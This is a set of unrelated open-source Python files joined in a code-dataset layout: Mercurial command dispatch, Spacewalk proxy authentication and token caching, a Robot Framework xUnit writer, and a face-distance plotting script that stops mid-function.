              pats=cmdpats, opts=cmdoptions)
    ret = _runcommand(ui, options, cmd, d)
    # run post-hook, passing the command result along
    hook.hook(lui, repo, "post-%s" % cmd, False, args=argstext,
              result=ret, pats=cmdpats, opts=cmdoptions)
    return ret
def _getlocal(ui, rpath):
    """Return (path, local ui object) for the given target path.

    Takes paths in [cwd]/.hg/hgrc into account.
    """
    try:
        wd = os.getcwd()
    except OSError, e:
        raise util.Abort(_("error getting current working directory: %s") %
                         e.strerror)
    path = cmdutil.findrepo(wd) or ""
    if not path:
        lui = ui
    else:
        lui = ui.copy()
        lui.readconfig(os.path.join(path, ".hg", "hgrc"), path)

    if rpath and rpath[-1]:
        # an explicit -R/--repository overrides the cwd-derived repo
        path = lui.expandpath(rpath[-1])
        lui = ui.copy()
        lui.readconfig(os.path.join(path, ".hg", "hgrc"), path)

    return path, lui
def _checkshellalias(lui, ui, args):
    """If args resolves to a shell ('!'-prefixed) alias, return a runner.

    Returns a zero-argument callable that executes the alias, or None
    when the arguments do not name a shell alias.  The module-level
    commands.norepo/optionalrepo strings, which addaliases() may extend,
    are restored on every non-shell-alias path.
    """
    options = {}
    try:
        args = fancyopts.fancyopts(args, commands.globalopts, options)
    except fancyopts.getopt.GetoptError:
        return
    if not args:
        return

    savednorepo = commands.norepo
    savedoptionalrepo = commands.optionalrepo

    def restorecommands():
        commands.norepo = savednorepo
        commands.optionalrepo = savedoptionalrepo

    # resolve against a private copy of the command table with aliases
    cmdtable = commands.table.copy()
    addaliases(lui, cmdtable)

    cmd = args[0]
    try:
        aliases, entry = cmdutil.findcmd(cmd, cmdtable,
                                         lui.configbool("ui", "strict"))
    except (error.AmbiguousCommand, error.UnknownCommand):
        restorecommands()
        return

    cmd = aliases[0]
    fn = entry[0]

    if cmd and util.safehasattr(fn, 'shell'):
        d = lambda: fn(ui, *args[1:])
        return lambda: runcommand(lui, None, cmd, args[:1], ui, options, d,
                                  [], {})

    restorecommands()
# names of extensions already wired into commands.table; _dispatch() may
# run several times per process (e.g. under TortoiseHg), so this avoids
# reconfiguring the same extension twice
_loaded = set()
def _dispatch(req):
    """Locate the repository and command, then execute the command.

    Handles --cwd/-R early options, extension loading, alias expansion,
    global-option side effects (--verbose, --time, --encoding, ...), and
    repository creation/inference before delegating to runcommand().
    """
    args = req.args
    ui = req.ui

    # check for cwd
    cwd = _earlygetopt(['--cwd'], args)
    if cwd:
        os.chdir(cwd[-1])

    rpath = _earlygetopt(["-R", "--repository", "--repo"], args)
    path, lui = _getlocal(ui, rpath)

    # Now that we're operating in the right directory/repository with
    # the right config settings, check for shell aliases
    shellaliasfn = _checkshellalias(lui, ui, args)
    if shellaliasfn:
        return shellaliasfn()

    # Configure extensions in phases: uisetup, extsetup, cmdtable, and
    # reposetup. Programs like TortoiseHg will call _dispatch several
    # times so we keep track of configured extensions in _loaded.
    extensions.loadall(lui)
    exts = [ext for ext in extensions.extensions() if ext[0] not in _loaded]
    # Propagate any changes to lui.__class__ by extensions
    ui.__class__ = lui.__class__

    # (uisetup and extsetup are handled in extensions.loadall)

    for name, module in exts:
        cmdtable = getattr(module, 'cmdtable', {})
        overrides = [cmd for cmd in cmdtable if cmd in commands.table]
        if overrides:
            ui.warn(_("extension '%s' overrides commands: %s\n")
                    % (name, " ".join(overrides)))
        commands.table.update(cmdtable)
        _loaded.add(name)

    # (reposetup is handled in hg.repository)

    addaliases(lui, commands.table)

    # check for fallback encoding
    fallback = lui.config('ui', 'fallbackencoding')
    if fallback:
        encoding.fallbackencoding = fallback

    fullargs = args
    cmd, func, args, options, cmdoptions = _parse(lui, args)

    # these options were consumed by _earlygetopt above; seeing them here
    # means they were abbreviated or glued to other flags
    if options["config"]:
        raise util.Abort(_("option --config may not be abbreviated!"))
    if options["cwd"]:
        raise util.Abort(_("option --cwd may not be abbreviated!"))
    if options["repository"]:
        raise util.Abort(_(
            "option -R has to be separated from other options (e.g. not -qR) "
            "and --repository may only be abbreviated as --repo!"))

    if options["encoding"]:
        encoding.encoding = options["encoding"]
    if options["encodingmode"]:
        encoding.encodingmode = options["encodingmode"]
    if options["time"]:
        def get_times():
            t = os.times()
            if t[4] == 0.0: # Windows leaves this as zero, so use time.clock()
                t = (t[0], t[1], t[2], t[3], time.clock())
            return t
        s = get_times()
        def print_time():
            t = get_times()
            ui.warn(_("time: real %.3f secs (user %.3f+%.3f sys %.3f+%.3f)\n") %
                    (t[4]-s[4], t[0]-s[0], t[2]-s[2], t[1]-s[1], t[3]-s[3]))
        atexit.register(print_time)

    uis = set([ui, lui])

    if req.repo:
        uis.add(req.repo.ui)

    if options['verbose'] or options['debug'] or options['quiet']:
        for opt in ('verbose', 'debug', 'quiet'):
            val = str(bool(options[opt]))
            for ui_ in uis:
                ui_.setconfig('ui', opt, val)

    if options['traceback']:
        for ui_ in uis:
            ui_.setconfig('ui', 'traceback', 'on')

    if options['noninteractive']:
        for ui_ in uis:
            ui_.setconfig('ui', 'interactive', 'off')

    if cmdoptions.get('insecure', False):
        for ui_ in uis:
            ui_.setconfig('web', 'cacerts', '')

    if options['version']:
        return commands.version_(ui)
    if options['help']:
        return commands.help_(ui, cmd)
    elif not cmd:
        return commands.help_(ui, 'shortlist')

    repo = None
    cmdpats = args[:]
    if cmd not in commands.norepo.split():
        # use the repo from the request only if we don't have -R
        if not rpath and not cwd:
            repo = req.repo

        if repo:
            # set the descriptors of the repo ui to those of ui
            repo.ui.fin = ui.fin
            repo.ui.fout = ui.fout
            repo.ui.ferr = ui.ferr
        else:
            try:
                repo = hg.repository(ui, path=path)
                if not repo.local():
                    raise util.Abort(_("repository '%s' is not local") % path)
                if options['hidden']:
                    repo = repo.unfiltered()
                repo.ui.setconfig("bundle", "mainreporoot", repo.root)
            except error.RequirementError:
                raise
            except error.RepoError:
                if cmd not in commands.optionalrepo.split():
                    if (cmd in commands.inferrepo.split() and
                        args and not path): # try to infer -R from command args
                        repos = map(cmdutil.findrepo, args)
                        guess = repos[0]
                        if guess and repos.count(guess) == len(repos):
                            req.args = ['--repository', guess] + fullargs
                            return _dispatch(req)
                    if not path:
                        raise error.RepoError(_("no repository found in '%s'"
                                                " (.hg not found)")
                                              % os.getcwd())
                    raise
        if repo:
            ui = repo.ui
            args.insert(0, repo)
    elif rpath:
        ui.warn(_("warning: --repository ignored\n"))

    msg = ' '.join(' ' in a and repr(a) or a for a in fullargs)
    ui.log("command", '%s\n', msg)
    d = lambda: util.checksignature(func)(ui, *args, **cmdoptions)
    try:
        return runcommand(lui, repo, cmd, fullargs, ui, options, d,
                          cmdpats, cmdoptions)
    finally:
        # close repositories we opened ourselves, but not the request's
        if repo and repo != req.repo:
            repo.close()
def lsprofile(ui, func, fp):
    """Run *func* under the lsprof profiler, writing results to *fp*.

    Output format, sort field, and entry limits come from the
    [profiling] configuration section.
    """
    # local renamed from 'format' to avoid shadowing the builtin
    outformat = ui.config('profiling', 'format', default='text')
    field = ui.config('profiling', 'sort', default='inlinetime')
    limit = ui.configint('profiling', 'limit', default=30)
    climit = ui.configint('profiling', 'nested', default=5)

    if outformat not in ['text', 'kcachegrind']:
        ui.warn(_("unrecognized profiling format '%s'"
                  " - Ignored\n") % outformat)
        outformat = 'text'

    try:
        from mercurial import lsprof
    except ImportError:
        raise util.Abort(_(
            'lsprof not available - install from '
            'http://codespeak.net/svn/user/arigo/hack/misc/lsprof/'))

    p = lsprof.Profiler()
    p.enable(subcalls=True)
    try:
        return func()
    finally:
        # emit the report even when func() raised
        p.disable()
        if outformat == 'kcachegrind':
            import lsprofcalltree
            calltree = lsprofcalltree.KCacheGrind(p)
            calltree.output(fp)
        else:
            stats = lsprof.Stats(p.getstats())
            stats.sort(field)
            stats.pprint(limit=limit, file=fp, climit=climit)
def statprofile(ui, func, fp):
    """Run *func* under the statprof sampling profiler, reporting to *fp*."""
    try:
        import statprof
    except ImportError:
        raise util.Abort(_(
            'statprof not available - install using "easy_install statprof"'))

    freq = ui.configint('profiling', 'freq', default=1000)
    if freq > 0:
        # sampling frequency in Hz
        statprof.reset(freq)
    else:
        ui.warn(_("invalid sampling frequency '%s' - ignoring\n") % freq)

    statprof.start()
    try:
        return func()
    finally:
        # display results even when func() raised
        statprof.stop()
        statprof.display(fp)
def _runcommand(ui, options, cmd, cmdfunc):
    """Invoke *cmdfunc*, optionally under a profiler.

    A SignatureError raised by the command function is translated into
    a CommandError ("invalid arguments") for nicer reporting.
    """
    def checkargs():
        try:
            return cmdfunc()
        except error.SignatureError:
            raise error.CommandError(cmd, _("invalid arguments"))

    if not options['profile']:
        return checkargs()

    # profiler backend: $HGPROF overrides the [profiling] type setting
    profiler = os.getenv('HGPROF')
    if profiler is None:
        profiler = ui.config('profiling', 'type', default='ls')
    if profiler not in ('ls', 'stat'):
        ui.warn(_("unrecognized profiler '%s' - ignored\n") % profiler)
        profiler = 'ls'

    output = ui.config('profiling', 'output')
    if output:
        fp = open(ui.expandpath(output), 'wb')
    else:
        fp = sys.stderr
    try:
        if profiler == 'ls':
            return lsprofile(ui, checkargs, fp)
        return statprofile(ui, checkargs, fp)
    finally:
        if output:
            fp.close()
| jordigh/mercurial-crew | mercurial/dispatch.py | Python | gpl-2.0 | 31,772 |
# Spacewalk Proxy Server authentication manager.
#
# Copyright (c) 2008--2015 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
# -----------------------------------------------------------------------------
# system imports
import os
import time
import socket
import xmlrpclib
import sys
# pylint: disable=E0611
from hashlib import sha1
# common imports
from spacewalk.common.rhnLib import parseUrl
from spacewalk.common.rhnTB import Traceback
from spacewalk.common.rhnLog import log_debug, log_error
from spacewalk.common.rhnConfig import CFG
from spacewalk.common.rhnException import rhnFault
from spacewalk.common import rhnCache
from spacewalk.common.rhnTranslate import _
# local imports
from rhn import rpclib
from rhn import SSL
import rhnAuthCacheClient
sys.path.append('/usr/share/rhn')
from up2date_client import config # pylint: disable=E0012, C0413
# To avoid doing unnecessary work, keep ProxyAuth object global
__PROXY_AUTH = None
# up2date configuration; supplies systemIdPath consumed by ProxyAuth
UP2DATE_CONFIG = config.Config('/etc/sysconfig/rhn/up2date')
def get_proxy_auth(hostname=None):
    """Return the shared ProxyAuth instance, (re)creating it as needed.

    A new instance is built on first use or whenever the requested
    hostname differs from the cached instance's hostname.
    """
    global __PROXY_AUTH
    if not __PROXY_AUTH or __PROXY_AUTH.hostname != hostname:
        __PROXY_AUTH = ProxyAuth(hostname)
    return __PROXY_AUTH
class ProxyAuth:
    """Manages this proxy's authentication state against rhn_parent."""

    # identity state is stored on the class, shared by all instances
    __serverid = None
    __systemid = None
    __systemid_mtime = None
    __systemid_filename = UP2DATE_CONFIG['systemIdPath']
    __nRetries = 3 # number of login retries
    hostname = None
    def __init__(self, hostname):
        """Bind this auth manager to *hostname* and load systemid state."""
        log_debug(3)
        # stored on the class so every instance sees the same hostname
        ProxyAuth.hostname = hostname
        self.__processSystemid()
    def __processSystemid(self):
        """ update the systemid/serverid but only if they stat differently.
            returns 0=no updates made; or 1=updates were made
        """
        if not os.access(ProxyAuth.__systemid_filename, os.R_OK):
            log_error("unable to access %s" % ProxyAuth.__systemid_filename)
            raise rhnFault(1000,
                           _("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
                             "Please contact your system administrator."))

        mtime = None
        try:
            # index -2 of the os.stat() tuple is st_mtime
            mtime = os.stat(ProxyAuth.__systemid_filename)[-2]
        except IOError, e:
            # NOTE(review): os.stat raises OSError, not IOError, on most
            # platforms -- this handler may never fire; confirm intent
            log_error("unable to stat %s: %s" % (ProxyAuth.__systemid_filename, repr(e)))
            raise rhnFault(1000,
                           _("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
                             "Please contact your system administrator.")), None, sys.exc_info()[2]

        if not self.__systemid_mtime:
            ProxyAuth.__systemid_mtime = mtime

        # skip the re-read when the file is unchanged and ids are cached
        if self.__systemid_mtime == mtime \
                and self.__systemid and self.__serverid:
            # nothing to do
            return 0

        # get systemid
        try:
            ProxyAuth.__systemid = open(ProxyAuth.__systemid_filename, 'r').read()
        except IOError, e:
            log_error("unable to read %s" % ProxyAuth.__systemid_filename)
            raise rhnFault(1000,
                           _("Spacewalk Proxy error (Spacewalk Proxy systemid has wrong permissions?). "
                             "Please contact your system administrator.")), None, sys.exc_info()[2]

        # get serverid: systemid is an XML-RPC encoded structure whose
        # 'system_id' field carries an 'ID-' style prefix of 3 characters
        sysid, _cruft = xmlrpclib.loads(ProxyAuth.__systemid)
        ProxyAuth.__serverid = sysid[0]['system_id'][3:]

        log_debug(7, 'SystemId: "%s[...snip snip...]%s"'
                  % (ProxyAuth.__systemid[:20], ProxyAuth.__systemid[-20:]))
        log_debug(7, 'ServerId: %s' % ProxyAuth.__serverid)

        # ids were updated
        return 1
    def get_system_id(self):
        """ return the system id"""
        # refresh from disk first in case the systemid file changed
        self.__processSystemid()
        return self.__systemid
def check_cached_token(self, forceRefresh=0):
""" check cache, login if need be, and cache.
"""
log_debug(3)
oldToken = self.get_cached_token()
token = oldToken
if not token or forceRefresh or self.__processSystemid():
token = self.login()
if token and token != oldToken:
self.set_cached_token(token)
return token
    def get_cached_token(self):
        """ Fetches this proxy's token (or None) from the cache
        """
        log_debug(3)
        # Try to connect to the token-cache.
        shelf = get_auth_shelf()
        # Fetch the token
        key = self.__cache_proxy_key()
        # has_key is the Python 2 / shelf-object membership API; the shelf
        # returned by get_auth_shelf() may not support the 'in' operator
        if shelf.has_key(key):
            return shelf[key]
        return None
    def set_cached_token(self, token):
        """ Caches current token in the auth cache.
        """
        log_debug(3)
        # Try to connect to the token-cache.
        shelf = get_auth_shelf()
        # Cache the token.
        try:
            shelf[self.__cache_proxy_key()] = token
        except:
            # deliberately broad: any cache failure (daemon down, corrupt
            # token, ...) is logged and surfaced as a single rhnFault
            text = _("""\
Caching of authentication token for proxy id %s failed!
Either the authentication caching daemon is experiencing
problems, isn't running, or the token is somehow corrupt.
""") % self.__serverid
            Traceback("ProxyAuth.set_cached_token", extra=text)
            raise rhnFault(1000,
                           _("Spacewalk Proxy error (auth caching issue). "
                             "Please contact your system administrator.")), None, sys.exc_info()[2]
        log_debug(4, "successfully returning")
        return token
def del_cached_token(self):
"""Removes the token from the cache
"""
log_debug(3)
# Connect to the token cache
shelf = get_auth_shelf()
key = self.__cache_proxy_key()
try:
del shelf[key]
except KeyError:
# no problem
pass
    def login(self):
        """Log in upstream and fetch a new proxy auth token.

        Only the broker component uses this. We perform an xmlrpc request
        to rhn_parent, outside of the http process we are currently working
        on, doing all of our own SSL decision-making; CFG.RHN_PARENT is
        used because we always bypass the SSL redirect.

        Token format: 'S:U:ST:EO:SIG' where S = server ID, U = username,
        ST = server time, EO = expiration offset, SIG = signature. This
        broker appends ':H' (its own hostname), so the final token is
        'S:U:ST:EO:SIG:H' -- enough to identify exactly which proxy the
        token belongs to.

        Such tokens are later chained (comma-separated) in the
        X-RHN-Proxy-Auth header to record how a client request was routed
        through a hierarchy of RHN proxies: the leftmost token is the first
        proxy hit by the request, the rightmost the last.

        Raises rhnFault on unrecoverable errors; returns the token string.
        """
        # pylint: disable=R0915
        log_debug(3)
        server = self.__getXmlrpcServer()
        error = None
        token = None
        # update the systemid/serverid if need be.
        self.__processSystemid()
        # Makes three attempts to login
        for _i in range(self.__nRetries):
            try:
                token = server.proxy.login(self.__systemid)
            except (socket.error, socket.sslerror), e:
                if CFG.HTTP_PROXY:
                    # socket error, check to see if your HTTP proxy is running...
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    httpProxy, httpProxyPort = CFG.HTTP_PROXY.split(':')
                    try:
                        s.connect((httpProxy, int(httpProxyPort)))
                    except socket.error, e:
                        error = ['socket.error', 'HTTP Proxy not running? '
                                 '(%s) %s' % (CFG.HTTP_PROXY, e)]
                        # rather big problem: http proxy not running.
                        log_error("*** ERROR ***: %s" % error[1])
                        Traceback(mail=0)
                    except socket.sslerror, e:
                        error = ['socket.sslerror',
                                 '(%s) %s' % (CFG.HTTP_PROXY, e)]
                        # rather big problem: http proxy not running.
                        log_error("*** ERROR ***: %s" % error[1])
                        Traceback(mail=0)
                    else:
                        # Probe succeeded: the HTTP proxy is fine, so the
                        # original failure was a plain socket error upstream.
                        error = ['socket', str(e)]
                        log_error(error)
                        Traceback(mail=0)
                else:
                    log_error("Socket error", e)
                    Traceback(mail=0)
                Traceback(mail=1)
                token = None
                # Brief back-off before retrying the login.
                time.sleep(.25)
                continue
            except SSL.SSL.Error, e:
                token = None
                error = ['rhn.SSL.SSL.Error', repr(e), str(e)]
                log_error(error)
                Traceback(mail=0)
                time.sleep(.25)
                continue
            except xmlrpclib.ProtocolError, e:
                token = None
                log_error('xmlrpclib.ProtocolError', e)
                time.sleep(.25)
                continue
            except xmlrpclib.Fault, e:
                # Report it through the mail
                # Traceback will try to walk over all the values
                # in each stack frame, and eventually will try to stringify
                # the method object itself
                # This should trick it, since the originator of the exception
                # is this function, instead of a deep call into xmlrpclib
                log_error("%s" % e)
                if e.faultCode == 10000:
                    # reraise it for the users (outage or "important message"
                    # coming through")
                    raise rhnFault(e.faultCode, e.faultString), None, sys.exc_info()[2]
                # ok... it's some other fault
                Traceback("ProxyAuth.login (Fault) - Spacewalk Proxy not "
                          "able to log in.")
                # And raise a Proxy Error - the server made its point loud and
                # clear
                raise rhnFault(1000,
                               _("Spacewalk Proxy error (during proxy login). "
                                 "Please contact your system administrator.")), None, sys.exc_info()[2]
            except Exception, e: # pylint: disable=E0012, W0703
                token = None
                log_error("Unhandled exception", e)
                Traceback(mail=0)
                time.sleep(.25)
                continue
            else:
                break
        if not token:
            if error:
                if error[0] in ('xmlrpclib.ProtocolError', 'socket.error', 'socket'):
                    raise rhnFault(1000,
                                   _("Spacewalk Proxy error (error: %s). "
                                     "Please contact your system administrator.") % error[0])
                if error[0] in ('rhn.SSL.SSL.Error', 'socket.sslerror'):
                    raise rhnFault(1000,
                                   _("Spacewalk Proxy error (SSL issues? Error: %s). "
                                     "Please contact your system administrator.") % error[0])
                else:
                    # NOTE(review): 'e' here is the exception variable leaked
                    # from the except clauses above -- this relies on Python 2
                    # scoping and would be a NameError on Python 3.
                    raise rhnFault(1002, err_text='%s' % e)
            else:
                raise rhnFault(1001)
        if self.hostname:
            # Tag our hostname onto the token (see docstring: 'S:U:ST:EO:SIG:H').
            token = token + ':' + self.hostname
        log_debug(6, "New proxy token: %s" % token)
        return token
    @staticmethod
    def get_client_token(clientid):
        """Return the cached auth token for *clientid*, or None if absent."""
        shelf = get_auth_shelf()
        # has_key() rather than 'in': the shelf may be an AuthLocalBackend,
        # which implements only part of the mapping protocol.
        if shelf.has_key(clientid):
            return shelf[clientid]
        return None
    @staticmethod
    def set_client_token(clientid, token):
        """Store *token* for *clientid* in the auth cache."""
        shelf = get_auth_shelf()
        shelf[clientid] = token
def update_client_token_if_valid(self, clientid, token):
# Maybe a load-balanced proxie and client logged in through a
# different one? Ask upstream if token is valid. If it is,
# upate cache.
# copy to simple dict for transmission. :-/
dumbToken = {}
satInfo = None
for key in ('X-RHN-Server-Id', 'X-RHN-Auth-User-Id', 'X-RHN-Auth',
'X-RHN-Auth-Server-Time', 'X-RHN-Auth-Expire-Offset'):
if token.has_key(key):
dumbToken[key] = token[key]
try:
s = self.__getXmlrpcServer()
satInfo = s.proxy.checkTokenValidity(
dumbToken, self.get_system_id())
except Exception: # pylint: disable=E0012, W0703
pass # Satellite is not updated enough, keep old behavior
# False if not valid token, a dict of info we need otherwise
# We have to calculate the proxy-clock-skew between Sat and this
# Proxy, as well as store the subscribed channels for this client
# (which the client does not pass up in headers and which we
# wouldn't trust even if it did).
if satInfo:
clockSkew = time.time() - float(satInfo['X-RHN-Auth-Server-Time'])
dumbToken['X-RHN-Auth-Proxy-Clock-Skew'] = clockSkew
dumbToken['X-RHN-Auth-Channels'] = satInfo['X-RHN-Auth-Channels']
# update our cache so we don't have to ask next time
self.set_client_token(clientid, dumbToken)
return dumbToken
return None
# __private methods__
    @staticmethod
    def __getXmlrpcServer():
        """Build and return an xmlrpc server object pointed at RHN_PARENT.

        WARNING: if CFG.USE_SSL is off, we are sending info in the clear.

        Raises rhnFault(1000) when SSL is enabled but the configured CA
        chain file is missing or unreadable.
        """
        log_debug(3)
        # build the URL: host part of RHN_PARENT, scheme per USE_SSL.
        url = CFG.RHN_PARENT or ''
        url = parseUrl(url)[1].split(':')[0]
        if CFG.USE_SSL:
            url = 'https://' + url + '/XMLRPC'
        else:
            url = 'http://' + url + '/XMLRPC'
        log_debug(3, 'server url: %s' % url)
        if CFG.HTTP_PROXY:
            # Route through the configured outbound HTTP proxy.
            serverObj = rpclib.Server(url,
                                      proxy=CFG.HTTP_PROXY,
                                      username=CFG.HTTP_PROXY_USERNAME,
                                      password=CFG.HTTP_PROXY_PASSWORD)
        else:
            serverObj = rpclib.Server(url)
        if CFG.USE_SSL and CFG.CA_CHAIN:
            if not os.access(CFG.CA_CHAIN, os.R_OK):
                log_error('ERROR: missing or cannot access (for ca_chain): %s' % CFG.CA_CHAIN)
                raise rhnFault(1000,
                               _("Spacewalk Proxy error (file access issues). "
                                 "Please contact your system administrator. "
                                 "Please refer to Spacewalk Proxy logs."))
            serverObj.add_trusted_cert(CFG.CA_CHAIN)
        serverObj.add_header('X-RHN-Client-Version', 2)
        return serverObj
    def __cache_proxy_key(self):
        # Cache key: 'p' + serverid + SHA1(hostname), so tokens cached for
        # distinct hostnames (e.g. load-balanced peers) never collide.
        # NOTE(review): sha1() is fed a str here; on Python 3 hashlib
        # requires bytes -- confirm this module only runs under Python 2.
        return 'p' + str(self.__serverid) + sha1(self.hostname).hexdigest()
    def getProxyServerId(self):
        """Return the numeric server id parsed from this proxy's systemid."""
        return self.__serverid
def get_auth_shelf():
    """Return the token-cache backend.

    A local rhnCache-backed store when USE_LOCAL_AUTH is set, otherwise a
    client for the auth-cache daemon configured in AUTH_CACHE_SERVER
    ('host:port').
    """
    if CFG.USE_LOCAL_AUTH:
        return AuthLocalBackend()
    host, port_str = CFG.AUTH_CACHE_SERVER.split(':')
    return rhnAuthCacheClient.Shelf((host, int(port_str)))
class AuthLocalBackend:
    """Dictionary-like token cache backed by the local rhnCache store.

    All keys are namespaced under the 'proxy-auth' prefix so they cannot
    clash with other rhnCache users.
    """
    _cache_prefix = "proxy-auth"

    def __init__(self):
        pass

    def has_key(self, key):
        """Python-2 style membership test against the backing cache."""
        return rhnCache.has_key(self._compute_key(key))

    def __getitem__(self, key):
        # missing_is_null=0 makes rhnCache raise on a missing entry, giving
        # this class dictionary-like lookup semantics.
        return rhnCache.get(self._compute_key(key), missing_is_null=0)

    def __setitem__(self, key, val):
        return rhnCache.set(self._compute_key(key), val)

    def __delitem__(self, key):
        return rhnCache.delete(self._compute_key(key))

    def _compute_key(self, key):
        """Prefix *key* with the cache namespace."""
        return os.path.join(self._cache_prefix, str(key))

    def __len__(self):
        # Intentionally unimplemented (returns None); len() on this object
        # is not supported by the backing store.
        pass
# ==============================================================================
| lhellebr/spacewalk | proxy/proxy/rhnProxyAuth.py | Python | gpl-2.0 | 18,014 |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robotide.lib.robot.result.visitor import ResultVisitor
from robotide.lib.robot.utils import XmlWriter
class XUnitWriter(object):
    """Serializes an execution result into an xUnit-compatible XML file."""

    def __init__(self, execution_result, skip_noncritical):
        self._execution_result = execution_result
        self._skip_noncritical = skip_noncritical

    def write(self, output):
        """Visit the stored result, streaming xUnit XML into *output*."""
        xml_writer = XmlWriter(output, encoding='UTF-8')
        visitor = XUnitFileWriter(xml_writer, self._skip_noncritical)
        self._execution_result.visit(visitor)
class XUnitFileWriter(ResultVisitor):
    """Result visitor that produces an xUnit-compatible result file.

    Attempts to adhere to the de facto schema guessed by Peter Reilly, see:
    http://marc.info/?l=ant-dev&m=123551933508682
    """

    def __init__(self, xml_writer, skip_noncritical=False):
        self._writer = xml_writer
        self._root_suite = None
        self._skip_noncritical = skip_noncritical

    def start_suite(self, suite):
        # Only the top-level suite opens the <testsuite> element; nested
        # suites are flattened into it.
        if self._root_suite:
            return
        self._root_suite = suite
        total, failed, skipped = self._get_stats(suite.statistics)
        self._writer.start('testsuite', {'name': suite.name,
                                         'tests': total,
                                         'errors': '0',
                                         'failures': failed,
                                         'skip': skipped})

    def _get_stats(self, statistics):
        # When non-critical tests are skipped, failures count only critical
        # tests and the rest are reported as skipped.
        if self._skip_noncritical:
            failures = statistics.critical.failed
            skip = statistics.all.total - statistics.critical.total
        else:
            failures = statistics.all.failed
            skip = 0
        return str(statistics.all.total), str(failures), str(skip)

    def end_suite(self, suite):
        if suite is self._root_suite:
            self._writer.end('testsuite')

    def visit_test(self, test):
        attrs = {'classname': test.parent.longname,
                 'name': test.name,
                 'time': self._time_as_seconds(test.elapsedtime)}
        self._writer.start('testcase', attrs)
        if self._skip_noncritical and not test.critical:
            self._skip_test(test)
        elif not test.passed:
            self._fail_test(test)
        self._writer.end('testcase')

    def _skip_test(self, test):
        content = '%s: %s' % (test.status, test.message) if test.message \
            else test.status
        self._writer.element('skipped', content)

    def _fail_test(self, test):
        self._writer.element('failure', attrs={'message': test.message,
                                               'type': 'AssertionError'})

    def _time_as_seconds(self, millis):
        # Round to the nearest whole second before converting from ms.
        return str(int(round(millis, -3) / 1000))

    def visit_keyword(self, kw):
        pass

    def visit_statistics(self, stats):
        pass

    def visit_errors(self, errors):
        pass

    def end_result(self, result):
        self._writer.close()
| fingeronthebutton/RIDE | src/robotide/lib/robot/reporting/xunitwriter.py | Python | apache-2.0 | 3,461 |
#!/usr/bin/env python
#
# This file is part of the Fun SDK (fsdk) project. The complete source code is
# available at https://github.com/luigivieira/fsdk.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import csv
import argparse
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
#---------------------------------------------
def main(argv):
    """
    Main entry point of this utility application.

    Reads the per-subject face-distance annotation CSVs from a hard-coded
    directory and plots each subject's distance series in a 5x7 grid of
    shared-axis subplots.

    This is simply a function called by the checking of namespace __main__, at
    the end of this script (in order to execute only when this script is ran
    directly).

    Parameters
    ------
    argv: list of str
        Arguments received from the command line (currently unused).
    """
    # NOTE(review): hard-coded, machine-specific path -- consider turning
    # this into a command-line argument.
    annotationsPath = 'C:/Users/luigi/Dropbox/Doutorado/dataset/annotation-all'
    #annotationsPath = 'C:/temp/teste'
    print('Reading data...')
    data = {}
    for dirpath, _, filenames in os.walk(annotationsPath):
        for f in filenames:
            # Only files named like '<prefix>_<subject>-face.<ext>' hold the
            # face annotations of interest.
            name = os.path.splitext(f)[0]
            parts = name.split('-')
            if len(parts) != 2 or parts[1] != 'face':
                continue
            subject = int(parts[0].split('_')[1])
            fileName = os.path.join(dirpath, f)
            print('\tfile {}...'.format(fileName))
            # Read the distance data
            with open(fileName, 'r', newline='') as file:
                reader = csv.DictReader(file, delimiter=',', quotechar='"',
                                        quoting=csv.QUOTE_MINIMAL)
                times = []
                distances = []
                gradients = []
                for row in reader:
                    # Convert frame number to minutes (video is 30 fps).
                    times.append(int(row['frame']) / 30 / 60)
                    distances.append(float(row['face.distance']))
                    gradients.append(float(row['face.gradient']))
                data[subject] = {'times': times, 'distances': distances,
                                 'gradients': gradients}
    print('Plotting data...')
    subjects = list(data.keys())
    values = list(data.values())
    # One subplot per subject in a 5x7 grid, sharing both axes.
    fig, axes = plt.subplots(5, 7, sharex = True, sharey = True)
    # NOTE(review): 'shared' is unused.
    shared = None
    for i, subject in enumerate(subjects):
        row = i // 7
        col = i % 7
        axis = axes[row, col]
        times = values[i]['times']
        distances = values[i]['distances']
        gradients = values[i]['gradients']
        # Forward-fill zero values (presumably face-detection failures)
        # with the last valid sample -- TODO confirm zero means "no face".
        svDist = 0
        svGrad = 0
        for j in range(len(times)):
            if distances[j] == 0:
                distances[j] = svDist
